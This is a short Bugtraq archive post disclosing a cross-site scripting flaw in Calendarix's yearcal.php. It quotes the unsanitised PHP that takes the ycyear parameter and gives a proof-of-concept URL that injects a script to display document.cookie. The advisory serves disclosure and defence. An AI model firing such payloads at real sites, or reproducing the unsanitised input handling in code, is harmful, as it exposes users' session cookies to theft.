Home page logo
/

bugtraq logo Bugtraq mailing list archives

Calendarix "yearcal.php" XSS Attacking
From: botan () linuxmail org
Date: 16 Apr 2006 17:50:57 -0000

Website : http://www.calendarix.com

Vulnerable : 

if (!isset($_GET['ycyear']))
  $ycyear = $y ;
else
  $ycyear = $_GET['ycyear'];

http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>


  By Date           By Thread  

Current thread:
  • Calendarix "yearcal.php" XSS Attacking botan (Apr 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]